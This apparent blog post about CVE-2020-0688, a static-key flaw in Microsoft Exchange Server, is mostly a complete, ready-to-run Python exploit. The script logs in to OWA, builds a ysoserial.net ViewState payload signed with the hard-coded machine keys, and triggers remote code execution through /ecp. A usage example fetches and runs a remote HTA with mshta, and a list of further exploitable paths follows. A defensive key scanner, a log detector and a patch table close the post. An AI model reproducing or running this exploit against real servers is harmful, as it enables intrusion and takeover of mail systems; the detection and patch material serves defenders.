CVE-2020-0688: Microsoft Exchange Server static key flaw leading to remote code execution (EXP)

Overview

In the February 2020 Patch Tuesday release, Microsoft published an important patch that fixes a remote code execution vulnerability in Microsoft Exchange Server. The vulnerability was reported to us by an anonymous researcher; it affects all supported versions of Microsoft Exchange Server and was fixed in the February update.

Video: https://youtu.be/7d_HoQ0LVy8

Initially, Microsoft stated that the vulnerability was caused by a memory corruption bug and could be exploited by sending a specially crafted email to a vulnerable Exchange server. Microsoft has since revised the write-up and now states that the vulnerability is caused by Exchange Server failing to create a unique cryptographic key at installation time.

Exploit:

# encoding: UTF-8
import requests
import readline
import argparse
import re
import sys
import os
import urllib3
from urllib.parse import urlparse
from urllib.parse import quote

urllib3.disable_warnings()

# ysoserial.net is expected to sit in ./ysoserial-1.32/ next to this script
ysoserial_path = os.path.abspath(os.path.dirname(__file__)) + "/ysoserial-1.32/"
session = requests.Session()


def get_value(url, user, pwd):
    """Log in to OWA, then read __VIEWSTATEGENERATOR and the ASP.NET_SessionId cookie from /ecp."""
    print("[*] Trying to login owa...")
    tmp = urlparse(url)
    base_url = "{}://{}".format(tmp.scheme, tmp.netloc)
    paramsPost = {"password": "" + pwd + "", "isUtf8": "1", "passwordText": "", "trusted": "4",
                  "destination": "" + url + "", "flags": "4", "forcedownlevel": "0", "username": "" + user + ""}
    headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
               "Upgrade-Insecure-Requests": "1",
               "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0",
               "Connection": "close", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate",
               "Content-Type": "application/x-www-form-urlencoded", "Cookie": "PrivateComputer=true; PBack=0"}
    cookies = {"PBack": "0", "PrivateComputer": "true"}
    login_url = base_url + '/owa/auth.owa'
    print("[+] Login url: {}".format(login_url))
    try:
        login = session.post(login_url, data=paramsPost,
                             headers=headers, verify=False, timeout=30)
        print("[*] Status code: %i" % login.status_code)
        if "reason=" in login.text or "reason=" in login.url and "owaLoading" in login.text:
            print("[!] Login Incorrect, please try again with a different account..")
            # sys.exit(1)
        # print(str(response.text))
    except Exception as e:
        print("[!] login error , error: {}".format(e))
        sys.exit(1)
    print("[+] Login successfully! \n")
    try:
        print("[*] Trying to get __VIEWSTATEGENERATOR...")
        target_url = "{}/ecp/default.aspx".format(base_url)
        new_response = session.get(target_url, verify=False, timeout=15)
        view = re.compile(
            'id="__VIEWSTATEGENERATOR" value="(.+?)"').findall(str(new_response.text))[0]
        print("[+] Done! __VIEWSTATEGENERATOR:{}".format(view))
    except:
        # fall back to the well-known generator value of /ecp/default.aspx
        view = "B97B4E27"
        print("[*] Can't get __VIEWSTATEGENERATOR, use default value: {}".format(view))
    try:
        print("[*] Trying to get ASP.NET_SessionId....")
        key = session.cookies['ASP.NET_SessionId']
        print("[+] Done!  ASP.NET_SessionId: {}".format(key))
    except Exception as e:
        key = None
        print("[!] Get ASP.NET_SessionId error, error: {} \n[*] Exit..".format(e))
    return view, key, base_url


def ysoserial(cmd):
    """Run ysoserial.net and return the last line of its output (the generated ViewState)."""
    cmd = ysoserial_path + cmd
    r = os.popen(cmd)
    res = r.readlines()
    return res[-1]


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("-s", "--server", required=True, help="ECP Server URL Example: http://ip/owa")
    parser.add_argument("-u", "--user", required=True, help="login account Example: domain\\user")
    parser.add_argument("-p", "--password", required=True, help="Password")
    parser.add_argument("-c", "--cmd", help="Command u want to execute", required=True)
    parser.add_argument("-e", "--encrypt", help="Encrypt the payload", action='store_true', default=False)
    args = parser.parse_args()
    url = args.server
    print("[*] Start to exploit..")
    user = args.user
    pwd = args.password
    command = args.cmd
    view, key, base_url = get_value(url, user, pwd)
    if key is None:
        key = 'test'
        sys.exit(1)
    # the static machineKey values shared by every unpatched Exchange install
    ex_payload = """ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "{}" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="{}" --viewstateuserkey="{}" --islegacy """.format(command, view, key)
    if args.encrypt:
        re_payload = ex_payload + ' --decryptionalg="3DES" --decryptionkey="E9D2490BD0075B51D1BA5288514514AF" --isencrypted'
    else:
        re_payload = ex_payload + " --isdebug"
    print("\n" + re_payload)
    out_payload = ysoserial(re_payload)
    if args.encrypt:
        final_exp = "{}/ecp/default.aspx?__VIEWSTATEENCRYPTED=&__VIEWSTATE={}".format(base_url, quote(out_payload))
    else:
        final_exp = "{}/ecp/default.aspx?__VIEWSTATEGENERATOR={}&__VIEWSTATE={}".format(base_url, view, quote(out_payload))
    print("\n[+] Exp url: {}".format(final_exp))
    print("\n[*] Auto trigger payload..")
    status = session.get(final_exp, verify=False, timeout=15)
    if status.status_code == 500:
        print("[*] Status code: %i, Maybe success!" % status.status_code)


if __name__ == "__main__":
    main()

Usage:

python3 CVE-2020-0688_EXP.py -h
usage: CVE-2020-0688_EXP.py [-h] -s SERVER -u USER -p PASSWORD -c CMD [-e]

optional arguments:
  -h, --help            show this help message and exit
  -s SERVER, --server SERVER
                        ECP Server URL Example: http://ip/owa
  -u USER, --user USER  login account Example: domain\user
  -p PASSWORD, --password PASSWORD
                        Password
  -c CMD, --cmd CMD     Command u want to execute
  -e, --encrypt         Encrypt the payload

Example:

python CVE-2020-0688_EXP.py -s https://mail.x.com/ -u [email protected] -p passwd -c "mshta http://1.1.1.1/test.hta"

Other usable paths (each with its page's __VIEWSTATEGENERATOR value):

/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27
/ecp/PersonalSettings/HomePage.aspx?showhelp=false&__VIEWSTATEGENERATOR=1D01FD4E
/ecp/Organize/AutomaticReplies.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/RulesEditor/InboxRules.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/Organize/DeliveryReports.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/MyGroups/PersonalGroups.aspx?showhelp=false&__VIEWSTATEGENERATOR=A767F62B
/ecp/MyGroups/ViewDistributionGroup.aspx?pwmcid=1&id=38f4bec5-704f-4272-a654-95d53150e2ae&ReturnObjectType=1&__VIEWSTATEGENERATOR=321473B8
/ecp/Customize/Messaging.aspx?showhelp=false&__VIEWSTATEGENERATOR=9C5731F0
/ecp/Customize/General.aspx?showhelp=false&__VIEWSTATEGENERATOR=72B13321
/ecp/Customize/Calendar.aspx?showhelp=false&__VIEWSTATEGENERATOR=4AD51055
/ecp/Customize/SentItems.aspx?showhelp=false&__VIEWSTATEGENERATOR=4466B13F
/ecp/PersonalSettings/Password.aspx?showhelp=false&__VIEWSTATEGENERATOR=59543DCA
/ecp/SMS/TextMessaging.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/TroubleShooting/MobileDevices.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0
/ecp/Customize/Regional.aspx?showhelp=false&__VIEWSTATEGENERATOR=9097CD08
/ecp/MyGroups/SearchAllGroups.slab?pwmcid=3&ReturnObjectType=1&__VIEWSTATEGENERATOR=FD338EE0
/ecp/Security/BlockOrAllow.aspx?showhelp=false&__VIEWSTATEGENERATOR=362253EF
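Two defender-side checks that follow from the write-up above, added here as an example and not part of the original post or exploit: a scan of an ECP web.config for the static machineKey values quoted in the exploit, and a pass over IIS W3C log lines that flags GET requests to /ecp/ pages carrying __VIEWSTATE in the query string, which is how the ViewState payload is delivered to the paths listed above. The web.config snippet and log lines are constructed sample input, and the log parser assumes the default IIS W3C field order.

```python
import re

# Key values quoted in this write-up; an ECP web.config that still carries them is unpatched.
STATIC_VALIDATION_KEY = "CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF"
STATIC_DECRYPTION_KEY = "E9D2490BD0075B51D1BA5288514514AF"

def has_static_machine_key(web_config: str) -> bool:
    """True if the <machineKey> element still uses the known static validation/decryption keys."""
    m = re.search(r"<machineKey\b[^>]*>", web_config, re.IGNORECASE)
    if not m:
        return False
    tag = m.group(0).upper()
    return STATIC_VALIDATION_KEY in tag or STATIC_DECRYPTION_KEY in tag

def suspicious_viewstate_requests(log_lines):
    """Return (c-ip, cs-uri-stem, sc-status) for /ecp/ GETs that carry __VIEWSTATE in the query.
    Assumes the default IIS W3C field order: date time s-ip cs-method cs-uri-stem cs-uri-query
    s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken"""
    hits = []
    for line in log_lines:
        if line.startswith("#"):  # directive and #Fields header lines
            continue
        f = line.split()
        if len(f) < 12:
            continue
        method, stem, query, c_ip, status = f[3], f[4], f[5], f[8], f[11]
        # A normal ECP postback sends __VIEWSTATE in the POST body; the exploit puts it in the GET query.
        if stem.lower().startswith("/ecp/") and method == "GET" and "__VIEWSTATE=" in query.upper():
            hits.append((c_ip, stem, status))
    return hits

# Constructed sample input (not real logs); the ViewState blobs are shortened placeholders.
SAMPLE_WEB_CONFIG = (
    '<system.web><machineKey validationKey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" '
    'decryptionKey="E9D2490BD0075B51D1BA5288514514AF" validation="SHA1" decryption="3DES" /></system.web>'
)
SAMPLE_LOG = [
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken",
    "2020-02-26 10:01:02 10.0.0.5 GET /ecp/default.aspx - 443 CORP\\alice 10.0.0.77 Mozilla/5.0+(X11) - 200 0 0 120",
    "2020-02-26 10:01:09 10.0.0.5 GET /ecp/default.aspx __VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=%2FwEy0A 443 CORP\\alice 10.0.0.77 Mozilla/5.0+(X11) - 500 0 0 300",
    "2020-02-26 10:02:00 10.0.0.5 GET /ecp/Customize/General.aspx showhelp=false&__VIEWSTATEGENERATOR=72B13321&__VIEWSTATE=%2FwEy0A 443 CORP\\bob 10.0.0.78 Mozilla/5.0+(X11) - 500 0 0 250",
    "2020-02-26 10:03:00 10.0.0.5 POST /ecp/default.aspx - 443 CORP\\alice 10.0.0.77 Mozilla/5.0+(X11) - 200 0 0 90",
]

if __name__ == "__main__":
    print("static machineKey present:", has_static_machine_key(SAMPLE_WEB_CONFIG))
    for hit in suspicious_viewstate_requests(SAMPLE_LOG):
        print("suspicious ViewState-in-URL request:", hit)
```

A 500 response on such a request matches the "Maybe success" condition the exploit checks for, so those hits deserve priority during triage.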

Updates and fix

The security update notes for all supported versions of Microsoft Exchange Server can be viewed, and the updates downloaded, from the table below:

Product | Article | Download
--- | --- | ---
Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30 | 4536989 | Security Update
Microsoft Exchange Server 2013 Cumulative Update 23 | 4536988 | Security Update
Microsoft Exchange Server 2016 Cumulative Update 14 | 4536987 | Security Update
Microsoft Exchange Server 2016 Cumulative Update 15 | 4536987 | Security Update
Microsoft Exchange Server 2019 Cumulative Update 3 | 4536987 | Security Update
Microsoft Exchange Server 2019 Cumulative Update 4 | 4536987 | Security Update